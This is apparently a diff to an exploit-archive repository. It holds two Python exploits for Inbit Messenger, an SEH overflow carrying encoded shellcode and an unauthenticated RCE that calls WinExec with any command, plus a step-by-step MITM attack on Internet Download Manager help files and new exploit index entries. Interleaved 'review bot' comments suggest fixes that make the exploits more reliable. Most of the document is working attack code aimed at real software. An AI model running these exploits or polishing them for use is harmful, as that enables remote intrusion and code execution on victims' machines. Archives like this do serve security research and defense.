SHELLCODE += b"\xd1\x7c\x0e\x18\x1a\x4f\xbe\xbc\x34\xda\xcd"
SHELLCODE += b"\x59\xb7\x14\xea\x2a\x6b\x71\x06\xa2\x72\x2f"
SHELLCODE += b"\xe9\xe1\x7e\x59\xd7\x5a\xc4\xf1\x75\x17\x86"
SHELLCODE += b"\x85\x65\x8c\xa4\x61\xca\x33\xb7\x8d\x9c\x93"
SHELLCODE += b"\x68\x52\x7c\x4c\x25\xdd\x30\xd6\x84\x3a\x40"
SHELLCODE += b"\xba\xc2\xb8\xd9\xa0\x63\xaa\xbc\x42\x2c\x44"
SHELLCODE += b"\x49\xf9\xa9\xf7\xdd\x9a\x54\x8c\x3d\x54\x5e"
SHELLCODE += b"\xe4\x71\xb2\x6b\x7c\x68\x8b\xb9\x14\x5a\xbf"
SHELLCODE += b"\x6c\xbb\x65\xef\xbe\xfb\xc9\xef\x94\xf3"
BANNER = """\033[0m\033[1;35m
\033[0m Inbit Messenger v4.6.0 - v4.9.0 Unauthenticated Remote SEH Overflow \033[1;35m
\033[0m
by: \033[1;36m
\033[1;36m
\033[1;36m
\033[1;36m
\033[1;36m
\033[1;36m
\033[0m"""
BAD_BYTES = b"\x3e" # >
PAYLOAD_LENGTH = 2000
nSEH = b"\xEB\x06\x90\x90" # JMP SHORT 0x8; NOP; NOP
SEH = struct.pack("<I", 0x263ae1bd) # ipworks6.dll | POP EBP; POP EBX; RET
# NOTE: sets the TEB's ACTIVATION_CONTEXT_STACK.ActiveFrame = NULL
NULL_ACT_CTX_STUB = b"\x31\xC0\xBB\x00\x10"
NULL_ACT_CTX_STUB += b"\x00\x00\x64\x8B\x48"
NULL_ACT_CTX_STUB += b"\x18\x39\x99\xA8\x01"
NULL_ACT_CTX_STUB += b"\x00\x00\x7C\x0A\x8B"
NULL_ACT_CTX_STUB += b"\x99\xA8\x01\x00\x00"
NULL_ACT_CTX_STUB += b"\x89\x03\xEB\x06\x89"
NULL_ACT_CTX_STUB += b"\x81\xB0\x01\x00\x00"
def exploit(targetIp:str, targetPort:int) -> None:
pkt = b"<"
pkt += (b"A" * 40)
pkt += nSEH
pkt += SEH
pkt += NULL_ACT_CTX_STUB
pkt += (b"\x90" * 32) # NOP sled for shikata_ga_nai decoder
pkt += SHELLCODE
# NOTE: need to send 1600+ bytes to overwrite beyond top of thread's stack
pkt += (b"B" * (PAYLOAD_LENGTH - len(pkt)))
# NOTE: check for bad bytes
for c in pkt:
if c in BAD_BYTES:
logging.error(f"found bad byte 0x{c:02x} in payload")
sys.exit(-1)
logging.info(f"sending {len(pkt)} byte payload to {targetIp}:{targetPort} ...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((targetIp, targetPort))
s.send(pkt)
s.close()
logging.success("DONE")
if __name__ == '__main__':
# parse arguments
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)
parser.add_argument('-t', '--target', help='target IP', type=str, required=True)
parser.add_argument('-p', '--port', help='target port', type=int, required=False, default=10883)
args = parser.parse_args()
# define logger
logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO')
logging.SUCCESS = logging.CRITICAL + 1
logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')
logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m')
logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')
logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m')
logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)
# print banner
print(BANNER)
# run exploit
exploit(args.target, args.port)
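Review bot: `s.send(pkt)` in `exploit()` may return after writing fewer than the full 2000 bytes, and the comment just above it says 1600+ bytes are needed to overwrite past the top of the thread's stack, so a short write turns the crash into a silent no-op; use `s.sendall(pkt)`. `logging.success` is also defined only inside the `__main__` block, so `exploit()` raises `AttributeError` on its last line if imported and called from another script; define the helper at module level next to `BANNER`. The `#!/usr/bin/env python3` line sits below the header comments rather than on line 1, so the executable bit has no effect. The bad-byte loop over `pkt` is good: it covers the encoded shellcode as well, which is why `-b '\x3E'` appears in the msfvenom command.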

exploits/windows/remote/51127.py Executable file

@ -0,0 +1,121 @@
# Exploit Title: Inbit Messenger v4.9.0 - Unauthenticated Remote Command Execution (RCE)
# Date: 11/08/2022
# Exploit Author: a-rey
# Vendor Homepage: http://www.inbit.com/support.html
# Software Link: http://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html
# Version: v4.6.0 - v4.9.0
# Tested on: Windows XP SP3, Windows 7, Windows 10, Windows Server 2019
# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys, socket, struct, string, argparse, logging
BANNER = """\033[0m\033[1;35m
\033[0m Inbit Messenger v4.6.0 - v4.9.0 Unauthenticated Remote Command Execution \033[1;35m
\033[0m
by: \033[1;36m
\033[1;36m
\033[1;36m
\033[1;36m
\033[1;36m
\033[1;36m
\033[0m"""
# NOTE: IAT addresses for KERNEL32!WinExec in IMS.EXE by build number
TARGETS = {
4601 : 0x005f3360,
4801 : 0x005f7364,
4901 : 0x005f7364,
}
# NOTE: min and max values for length of command
CMD_MIN_LEN = 10
CMD_MAX_LEN = 0xfc64
# NOTE: these bytes cannot be in the calculated address of WinExec to ensure overflow
BAD_BYTES = b"\x3e" # >
def getWinExecAddress(targetIp:str, targetPort:int) -> bytes:
# NOTE: send packet with client build number of 4601 for v4.6.0
pkt = b"<50><0><IM><ID>7</ID><a>1</a><b>4601</b><c>1</c></IM>\x00"
logging.info(f"trying to get version information from {targetIp}:{targetPort} ...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((targetIp, targetPort))
s.send(pkt)
_d = s.recv(1024)
# find build tag in response
if b'<c>' not in _d:
logging.error(f"invalid version packet received: {_d}")
sys.exit(-1)
s.close()
try:
build = int(_d[_d.index(b'<c>') + 3:_d.index(b'</c>')])
except:
logging.error(f"failed to parse build number from packet: {_d}")
sys.exit(-1)
# get the IAT offset
if build not in TARGETS.keys():
logging.error(f"unexpected build number: {build}")
sys.exit(-1)
# NOTE: we need to subtract 0x38 since the vulnerable instruction is 'CALL [EAX + 0x38]'
winexec = struct.pack("<I", TARGETS[build] - 0x38)
logging.success(f"target build number is {build}")
logging.info(f"WinExec @ 0x{TARGETS[build] - 0x38:08x}")
# sanity check for bad bytes in WinExec address
for c in winexec:
if c in BAD_BYTES:
logging.error(f"found bad byte in WinExec address: 0x{TARGETS[build] - 0x38:08x}")
sys.exit(-1)
return winexec
def exploit(targetIp:str, targetPort:int, command:bytes) -> None:
# NOTE: command must be NULL terminated
command += b"\x00"
# check user command length
if len(command) < CMD_MIN_LEN:
logging.error(f"command length must be at least {CMD_MIN_LEN} characters")
sys.exit(-1)
if len(command) >= CMD_MAX_LEN:
logging.error(f"command length must be less than {CMD_MAX_LEN} characters")
sys.exit(-1)
# get WinExec address
winexec = getWinExecAddress(targetIp, targetPort)
# get a string representation of the length of the command data after the <> tag parsed by atol()
pktLen = str(len(command))
pkt = b"<" # start of XML tag/stack overflow
pkt += pktLen.encode() # number parsed by atol() & length of command data following '>' character
pkt += b"\x00" # NULL terminator to force atol to ignore what comes next
# NOTE: adjust the 85 byte offset calculated that assumes a 2 byte string passed to atol()
pkt += (b"A" * (85 - (len(pktLen) - 2))) # padding up to function pointer overwrite
pkt += winexec # indirect function pointer we control
pkt += b">" # end of XML tag/stack overflow
pkt += command # the command set to the call to WinExec()
logging.info(f"sending payload to {targetIp}:{targetPort} ...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((targetIp, targetPort))
s.send(pkt)
s.close()
logging.success("DONE")
if __name__ == '__main__':
# parse arguments
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)
parser.add_argument('-t', '--target', help='target IP', type=str, required=True)
parser.add_argument('-c', '--command', help='command to run', type=str, required=True)
parser.add_argument('-p', '--port', help='target port', type=int, required=False, default=10883)
args = parser.parse_args()
# define logger
logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO')
logging.SUCCESS = logging.CRITICAL + 1
logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')
logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m')
logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')
logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m')
logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)
# print banner
print(BANNER)
# run exploit
exploit(args.target, args.port, args.command.encode())
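Review bot: the bare `except:` around `int(_d[_d.index(b'<c>') + 3:_d.index(b'</c>')])` catches `KeyboardInterrupt` and `SystemExit` along with the parse errors it is meant for; narrow it to `except ValueError:`, which is also what `_d.index(b'</c>')` raises when the closing tag is missing, the case this branch actually has to handle. Two smaller points: the `#!/usr/bin/env python3` line sits after the header comments, so it is not a shebang and the file will not run as `./51127.py` even though it is committed with the executable bit; and the header has no detection or mitigation notes, although the traffic is a fixed, unencrypted signature on TCP/10883 (a version probe `<50><0><IM><ID>7</ID>...</IM>` on one connection, then a second connection whose first bytes are `<`, an ASCII length, a NUL and a long run of `A`), which is worth recording for defenders next to the write-up link.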


@ -0,0 +1,43 @@
# Exploit Title: Internet Download Manager v6.41 Build 3 - Remote Code Execution (RCE)
# Date: 15.11.2022
# Exploit Author: M. Akil Gündoğan
# Contact: https://twitter.com/akilgundogan
# Vendor Homepage: https://www.internetdownloadmanager.com/
# Software Link: https://mirror2.internetdownloadmanager.com/idman641build3.exe?v=lt&filename=idman641build3.exe
# Version: v.6.41 Build 3
# Tested on: Windows 10 Professional x64
# PoC Video: https://youtu.be/0djlanUbfY4
Vulnerabiliy Description:
---------------------------------------
Some help files are missing in non-English versions of Internet Download Manager. Help files with the extension
".chm" prepared in the language used are downloaded from the internet and run, and displayed to users. This download is
done over HTTP, which is an insecure protocol. An attacker on the local network can spoof traffic with a MITM attack and
replaces ".chm" help files with malicious ".chm" files. IDM runs ".chm" files automatically after downloading.
This allows the attacker to execute code remotely.
It also uses HTTP for checking and downloading updates by IDM. The attacker can send fake updates as if the victim has a new update to the system.
Since we preferred to use Turkish IDM, our target address in the MITM attack was "http://www.internetdownloadmanager.com/languages/tut_tr.chm".
Requirements:
---------------------------------------
The attacker and the victim must be on the same local network.
The victim using the computer must have a user account with administrative privileges on the system. The attacker does not need to have administrator privileges!
Step by step produce:
---------------------------------------
1 - The attacker prepares a malicious CHM file. You can read the article at "https://sevenlayers.com/index.php/316-malicious-chm" for that.
2 - A MITM attack is made against the target using Ettercap or Bettercap.
3 - Let's redirect the domains "internetdownloadmanager.com" and "*.internetdownloadmanager.com" to our attacker machine with DNS spoofing.
4 - A web server is run on the attacking machine and the languages directory is created and the malicious ".chm" file with the
same name (tut_tr.chm / the file according to which language you are using.) is placed in it.
5 - When the victim opens Internet Download Manager and clicks on the "Tutorials" button, the download will start and our malicious ".chm" file will run automatically when it's finished.
Advisories:
---------------------------------------
Developers should stop using insecure HTTP in their update and download modules. In addition, every downloaded file
should not be run automatically, additional warning messages should be displayed for users.
Special thanks: p4rs, ratio, blackcode, zeyd.can and all friends.
---------------------------------------
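Review bot: the Requirements section states that the victim must be using an account with administrative privileges, but nothing in the description explains why; the ".chm" file is opened by the victim's own IDM process, so either say what the admin requirement is for (for example, whether the update path mentioned in the description runs elevated) or drop it. Under Advisories, the fix should go beyond moving to HTTPS: a downloaded help file or update package should be verified (code signature or a published hash) before it is opened, and the application should never launch a freshly downloaded file without user confirmation. Minor: "Vulnerabiliy Description" and "Step by step produce" should read "Vulnerability Description" and "Step by step procedure".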


@ -3518,6 +3518,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
17422,exploits/hardware/remote/17422.txt,"DreamBox DM800 - Arbitrary File Download",2011-06-21,ShellVision,remote,hardware,,2011-06-21,2011-07-24,1,OSVDB-73430;CVE-2011-4716,,,,, 17422,exploits/hardware/remote/17422.txt,"DreamBox DM800 - Arbitrary File Download",2011-06-21,ShellVision,remote,hardware,,2011-06-21,2011-07-24,1,OSVDB-73430;CVE-2011-4716,,,,,
18079,exploits/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 - File Disclosure",2011-11-04,"Todor Donev",remote,hardware,,2011-11-04,2016-12-05,0,CVE-2011-4716;OSVDB-73430,,,,, 18079,exploits/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 - File Disclosure",2011-11-04,"Todor Donev",remote,hardware,,2011-11-04,2016-12-05,0,CVE-2011-4716;OSVDB-73430,,,,,
48214,exploits/hardware/remote/48214.py,"Drobo 5N2 4.1.1 - Remote Command Injection",2020-03-13,"Ian Sindermann",remote,hardware,,2020-03-13,2020-03-13,0,,,,,, 48214,exploits/hardware/remote/48214.py,"Drobo 5N2 4.1.1 - Remote Command Injection",2020-03-13,"Ian Sindermann",remote,hardware,,2020-03-13,2020-03-13,0,,,,,,
51129,exploits/hardware/remote/51129.txt,"DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure",2023-03-29,"Aryan Chehreghani",remote,hardware,,2023-03-29,2023-03-29,0,,,,,,
45283,exploits/hardware/remote/45283.rb,"Eaton Xpert Meter 13.4.0.10 - SSH Private Key Disclosure",2018-08-29,BrianWGray,remote,hardware,,2018-08-29,2018-08-29,0,,,,,, 45283,exploits/hardware/remote/45283.rb,"Eaton Xpert Meter 13.4.0.10 - SSH Private Key Disclosure",2018-08-29,BrianWGray,remote,hardware,,2018-08-29,2018-08-29,0,,,,,,
47888,exploits/hardware/remote/47888.py,"EBBISLAND EBBSHAVE 6100-09-04-1441 - Remote Buffer Overflow",2020-01-08,hantwister,remote,hardware,,2020-01-08,2020-01-08,0,CVE-2017-3623,,,,, 47888,exploits/hardware/remote/47888.py,"EBBISLAND EBBSHAVE 6100-09-04-1441 - Remote Buffer Overflow",2020-01-08,hantwister,remote,hardware,,2020-01-08,2020-01-08,0,CVE-2017-3623,,,,,
28888,exploits/hardware/remote/28888.txt,"ECI Telecom B-Focus ADSL2+ Combo332+ Wireless Router - Information Disclosure",2006-10-31,LegendaryZion,remote,hardware,,2006-10-31,2013-10-12,1,CVE-2006-5711;OSVDB-30193,,,,,https://www.securityfocus.com/bid/20834/info 28888,exploits/hardware/remote/28888.txt,"ECI Telecom B-Focus ADSL2+ Combo332+ Wireless Router - Information Disclosure",2006-10-31,LegendaryZion,remote,hardware,,2006-10-31,2013-10-12,1,CVE-2006-5711;OSVDB-30193,,,,,https://www.securityfocus.com/bid/20834/info
@ -4830,6 +4831,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48247,exploits/hardware/webapps/48247.py,"UCM6202 1.0.18.13 - Remote Command Injection",2020-03-24,"Jacob Baines",webapps,hardware,,2020-03-24,2020-03-24,0,CVE-2020-5722,,,,, 48247,exploits/hardware/webapps/48247.py,"UCM6202 1.0.18.13 - Remote Command Injection",2020-03-24,"Jacob Baines",webapps,hardware,,2020-03-24,2020-03-24,0,CVE-2020-5722,,,,,
29312,exploits/hardware/webapps/29312.txt,"Unicorn Router WB-3300NR - Cross-Site Request Forgery (Factory Reset/DNS Change)",2013-10-30,absane,webapps,hardware,,2013-11-06,2013-11-06,0,OSVDB-99224,,,,, 29312,exploits/hardware/webapps/29312.txt,"Unicorn Router WB-3300NR - Cross-Site Request Forgery (Factory Reset/DNS Change)",2013-10-30,absane,webapps,hardware,,2013-11-06,2013-11-06,0,OSVDB-99224,,,,,
42150,exploits/hardware/webapps/42150.py,"Uniview NVR - Password Disclosure",2017-06-09,B1t,webapps,hardware,,2017-06-11,2017-10-03,0,,,,,, 42150,exploits/hardware/webapps/42150.py,"Uniview NVR - Password Disclosure",2017-06-09,B1t,webapps,hardware,,2017-06-11,2017-10-03,0,,,,,,
51130,exploits/hardware/webapps/51130.txt,"Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS)",2023-03-29,"Bleron Rrustemi",webapps,hardware,,2023-03-29,2023-03-29,0,,,,,,
30358,exploits/hardware/webapps/30358.txt,"UPC Ireland Cisco EPC 2425 Router / Horizon Box - WPA-PSK Handshake Information",2013-12-16,"Matt O'Connor",webapps,hardware,,2013-12-16,2017-11-15,0,CVE-2013-7136;OSVDB-101192,,,,,http://www.planitcomputing.ie/upc-wifi-attack.pdf 30358,exploits/hardware/webapps/30358.txt,"UPC Ireland Cisco EPC 2425 Router / Horizon Box - WPA-PSK Handshake Information",2013-12-16,"Matt O'Connor",webapps,hardware,,2013-12-16,2017-11-15,0,CVE-2013-7136;OSVDB-101192,,,,,http://www.planitcomputing.ie/upc-wifi-attack.pdf
24517,exploits/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,webapps,hardware,,2013-02-18,2013-02-18,0,OSVDB-90332;OSVDB-90331,,,,,https://www.vulnerability-lab.com/get_content.php?id=873 24517,exploits/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,webapps,hardware,,2013-02-18,2013-02-18,0,OSVDB-90332;OSVDB-90331,,,,,https://www.vulnerability-lab.com/get_content.php?id=873
42739,exploits/hardware/webapps/42739.txt,"UTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass",2017-09-15,"Gem George",webapps,hardware,,2017-09-18,2017-09-18,0,CVE-2017-14243,,,,, 42739,exploits/hardware/webapps/42739.txt,"UTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass",2017-09-15,"Gem George",webapps,hardware,,2017-09-18,2017-09-18,0,CVE-2017-14243,,,,,
@ -14801,6 +14803,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
17709,exploits/php/webapps/17709.txt,"Bonza Digital Cart Script - SQL Injection",2011-08-22,"Eyup CELIK",webapps,php,,2011-08-22,2011-08-22,1,,,,,, 17709,exploits/php/webapps/17709.txt,"Bonza Digital Cart Script - SQL Injection",2011-08-22,"Eyup CELIK",webapps,php,,2011-08-22,2011-08-22,1,,,,,,
5722,exploits/php/webapps/5722.txt,"Booby 1.0.1 - Multiple Remote File Inclusions",2008-06-02,HaiHui,webapps,php,,2008-06-01,2016-12-07,1,OSVDB-46333;CVE-2008-2645;OSVDB-46332;OSVDB-46331;OSVDB-46330;OSVDB-46329;OSVDB-46328;OSVDB-46327;OSVDB-46326,,,,http://www.exploit-db.combooby-1.0.1-12_May_2005.tar.gz, 5722,exploits/php/webapps/5722.txt,"Booby 1.0.1 - Multiple Remote File Inclusions",2008-06-02,HaiHui,webapps,php,,2008-06-01,2016-12-07,1,OSVDB-46333;CVE-2008-2645;OSVDB-46332;OSVDB-46331;OSVDB-46330;OSVDB-46329;OSVDB-46328;OSVDB-46327;OSVDB-46326,,,,http://www.exploit-db.combooby-1.0.1-12_May_2005.tar.gz,
12749,exploits/php/webapps/12749.txt,"Book Gallery - 'aboutbook.php' SQL Injection",2010-05-26,Mr.P3rfekT,webapps,php,,2010-05-25,,1,,,,,, 12749,exploits/php/webapps/12749.txt,"Book Gallery - 'aboutbook.php' SQL Injection",2010-05-26,Mr.P3rfekT,webapps,php,,2010-05-25,,1,,,,,,
51123,exploits/php/webapps/51123.txt,"Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS)",2023-03-29,"Rajeshwar Singh",webapps,php,,2023-03-29,2023-03-29,0,,,,,,
46486,exploits/php/webapps/46486.rb,"Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit)",2019-03-04,AkkuS,webapps,php,80,2019-03-04,2019-03-06,0,CVE-2019-9581,"Metasploit Framework (MSF)",,,http://www.exploit-db.combooked-2.7.5.zip, 46486,exploits/php/webapps/46486.rb,"Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit)",2019-03-04,AkkuS,webapps,php,80,2019-03-04,2019-03-06,0,CVE-2019-9581,"Metasploit Framework (MSF)",,,http://www.exploit-db.combooked-2.7.5.zip,
50594,exploits/php/webapps/50594.py,"Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated)",2021-12-14,0sunday,webapps,php,,2021-12-14,2021-12-14,0,CVE-2019-9581,,,,, 50594,exploits/php/webapps/50594.py,"Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated)",2021-12-14,0sunday,webapps,php,,2021-12-14,2021-12-14,0,CVE-2019-9581,,,,,
48428,exploits/php/webapps/48428.txt,"Booked Scheduler 2.7.7 - Authenticated Directory Traversal",2020-05-06,Besim,webapps,php,,2020-05-06,2020-05-06,0,,,,,, 48428,exploits/php/webapps/48428.txt,"Booked Scheduler 2.7.7 - Authenticated Directory Traversal",2020-05-06,Besim,webapps,php,,2020-05-06,2020-05-06,0,,,,,,
@ -19136,6 +19139,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
34608,exploits/php/webapps/34608.txt,"HeffnerCMS 1.22 - 'index.php' Local File Inclusion",2010-09-06,"MiND C0re",webapps,php,,2010-09-06,2014-09-10,1,,,,,,https://www.securityfocus.com/bid/43006/info 34608,exploits/php/webapps/34608.txt,"HeffnerCMS 1.22 - 'index.php' Local File Inclusion",2010-09-06,"MiND C0re",webapps,php,,2010-09-06,2014-09-10,1,,,,,,https://www.securityfocus.com/bid/43006/info
30734,exploits/php/webapps/30734.txt,"Helios Calendar 1.1/1.2 - 'admin/index.php' Cross-Site Scripting",2007-11-02,"Ivan Sanchez",webapps,php,,2007-11-02,2014-01-06,1,CVE-2007-5952;OSVDB-38408,,,,,https://www.securityfocus.com/bid/26312/info 30734,exploits/php/webapps/30734.txt,"Helios Calendar 1.1/1.2 - 'admin/index.php' Cross-Site Scripting",2007-11-02,"Ivan Sanchez",webapps,php,,2007-11-02,2014-01-06,1,CVE-2007-5952;OSVDB-38408,,,,,https://www.securityfocus.com/bid/26312/info
30293,exploits/php/webapps/30293.txt,"Helma 1.5.3 - Search Script Cross-Site Scripting",2007-07-12,"Hanno Boeck",webapps,php,,2007-07-12,2013-12-15,1,CVE-2007-3693;OSVDB-36872,,,,,https://www.securityfocus.com/bid/24880/info 30293,exploits/php/webapps/30293.txt,"Helma 1.5.3 - Search Script Cross-Site Scripting",2007-07-12,"Hanno Boeck",webapps,php,,2007-07-12,2013-12-15,1,CVE-2007-3693;OSVDB-36872,,,,,https://www.securityfocus.com/bid/24880/info
51132,exploits/php/webapps/51132.txt,"Helmet Store Showroom v1.0 - SQL Injection",2023-03-29,"Ameer Hamza",webapps,php,,2023-03-29,2023-03-29,0,,,,,,
26502,exploits/php/webapps/26502.txt,"Help Center Live 1.0/1.2/2.0 - 'module.php' Local File Inclusion",2005-11-14,"HACKERS PAL",webapps,php,,2005-11-14,2013-07-01,1,CVE-2005-3639;OSVDB-20861,,,,,https://www.securityfocus.com/bid/15404/info 26502,exploits/php/webapps/26502.txt,"Help Center Live 1.0/1.2/2.0 - 'module.php' Local File Inclusion",2005-11-14,"HACKERS PAL",webapps,php,,2005-11-14,2013-07-01,1,CVE-2005-3639;OSVDB-20861,,,,,https://www.securityfocus.com/bid/15404/info
12421,exploits/php/webapps/12421.txt,"Help Center Live 2.0.6 - 'module=helpcenter&file=' Local File Inclusion",2010-04-27,41.w4r10r,webapps,php,,2010-04-26,,1,OSVDB-64103;CVE-2010-1652,,,,, 12421,exploits/php/webapps/12421.txt,"Help Center Live 2.0.6 - 'module=helpcenter&file=' Local File Inclusion",2010-04-27,41.w4r10r,webapps,php,,2010-04-26,,1,OSVDB-64103;CVE-2010-1652,,,,,
28315,exploits/php/webapps/28315.txt,"Help Center Live 2.1.2 - 'module.php' Directory Traversal",2006-07-31,Dr.GooGle,webapps,php,,2006-07-31,2013-09-16,1,OSVDB-28285,,,,,https://www.securityfocus.com/bid/19256/info 28315,exploits/php/webapps/28315.txt,"Help Center Live 2.1.2 - 'module.php' Directory Traversal",2006-07-31,Dr.GooGle,webapps,php,,2006-07-31,2013-09-16,1,OSVDB-28285,,,,,https://www.securityfocus.com/bid/19256/info
@ -19347,6 +19351,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
34412,exploits/php/webapps/34412.txt,"Hulihan Applications BXR 0.6.8 - SQL Injection / HTML Injection",2010-08-05,"High-Tech Bridge SA",webapps,php,,2010-08-05,2014-08-26,1,CVE-2010-4963;OSVDB-67054,,,,,https://www.securityfocus.com/bid/42247/info 34412,exploits/php/webapps/34412.txt,"Hulihan Applications BXR 0.6.8 - SQL Injection / HTML Injection",2010-08-05,"High-Tech Bridge SA",webapps,php,,2010-08-05,2014-08-26,1,CVE-2010-4963;OSVDB-67054,,,,,https://www.securityfocus.com/bid/42247/info
49854,exploits/php/webapps/49854.txt,"Human Resource Information System 0.1 - 'First Name' Persistent Cross-Site Scripting (Authenticated)",2021-05-10,"Reza Afsahi",webapps,php,,2021-05-10,2021-05-10,0,,,,,, 49854,exploits/php/webapps/49854.txt,"Human Resource Information System 0.1 - 'First Name' Persistent Cross-Site Scripting (Authenticated)",2021-05-10,"Reza Afsahi",webapps,php,,2021-05-10,2021-05-10,0,,,,,,
49847,exploits/php/webapps/49847.py,"Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)",2021-05-07,"Reza Afsahi",webapps,php,,2021-05-07,2021-05-07,0,,,,,, 49847,exploits/php/webapps/49847.py,"Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)",2021-05-07,"Reza Afsahi",webapps,php,,2021-05-07,2021-05-07,0,,,,,,
51125,exploits/php/webapps/51125.txt,"Human Resource Management System 1.0 - SQL Injection (unauthenticated)",2023-03-29,"Matthijs van der Vaart (eMVee)",webapps,php,,2023-03-29,2023-03-29,0,,,,,,
51047,exploits/php/webapps/51047.txt,"Human Resources Management System v1.0 - Multiple SQLi",2023-03-25,"Abdulhakim Öner",webapps,php,,2023-03-25,2023-03-25,0,,,,,, 51047,exploits/php/webapps/51047.txt,"Human Resources Management System v1.0 - Multiple SQLi",2023-03-25,"Abdulhakim Öner",webapps,php,,2023-03-25,2023-03-25,0,,,,,,
9494,exploits/php/webapps/9494.txt,"humanCMS - Authentication Bypass",2009-08-24,next,webapps,php,,2009-08-23,,1,,,,,, 9494,exploits/php/webapps/9494.txt,"humanCMS - Authentication Bypass",2009-08-24,next,webapps,php,,2009-08-23,,1,,,,,,
35511,exploits/php/webapps/35511.txt,"Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-12-10,"Jos Wetzels_ Emiel Florijn",webapps,php,,2014-12-10,2014-12-10,0,OSVDB-115638;OSVDB-115637;OSVDB-115636,,,,, 35511,exploits/php/webapps/35511.txt,"Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-12-10,"Jos Wetzels_ Emiel Florijn",webapps,php,,2014-12-10,2014-12-10,0,OSVDB-115638;OSVDB-115637;OSVDB-115636,,,,,
@ -28370,6 +28375,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43312,exploits/php/webapps/43312.txt,"Resume Clone Script 2.0.5 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,,2017-12-11,2017-12-13,1,CVE-2017-17641,,,,, 43312,exploits/php/webapps/43312.txt,"Resume Clone Script 2.0.5 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,,2017-12-11,2017-12-13,1,CVE-2017-17641,,,,,
49353,exploits/php/webapps/49353.txt,"Resumes Management and Job Application Website 1.0 - Authentication Bypass",2021-01-05,"Kshitiz Raj",webapps,php,,2021-01-05,2021-10-28,0,,,,,, 49353,exploits/php/webapps/49353.txt,"Resumes Management and Job Application Website 1.0 - Authentication Bypass",2021-01-05,"Kshitiz Raj",webapps,php,,2021-01-05,2021-10-28,0,,,,,,
49380,exploits/php/webapps/49380.txt,"Resumes Management and Job Application Website 1.0 - RCE (Unauthenticated)",2021-01-06,"Arnav Tripathy",webapps,php,,2021-01-06,2021-10-11,0,,,,,, 49380,exploits/php/webapps/49380.txt,"Resumes Management and Job Application Website 1.0 - RCE (Unauthenticated)",2021-01-06,"Arnav Tripathy",webapps,php,,2021-01-06,2021-10-11,0,,,,,,
51133,exploits/php/webapps/51133.py,"Revenue Collection System v1.0 - Remote Code Execution (RCE)",2023-03-29,"Joe Pollock",webapps,php,,2023-03-29,2023-03-29,0,,,,,,
43821,exploits/php/webapps/43821.txt,"ReviewPost < 2.84 - Multiple Vulnerabilities",2015-01-02,"GulfTech Security",webapps,php,,2018-01-19,2018-01-19,0,GTSA-00060;CVE-2005-0270;CVE-2005-0271;CVE-2005-0272,,,,,http://gulftech.org/advisories/ReviewPost%20Multiple%20Vulnerabilities/60 43821,exploits/php/webapps/43821.txt,"ReviewPost < 2.84 - Multiple Vulnerabilities",2015-01-02,"GulfTech Security",webapps,php,,2018-01-19,2018-01-19,0,GTSA-00060;CVE-2005-0270;CVE-2005-0271;CVE-2005-0272,,,,,http://gulftech.org/advisories/ReviewPost%20Multiple%20Vulnerabilities/60
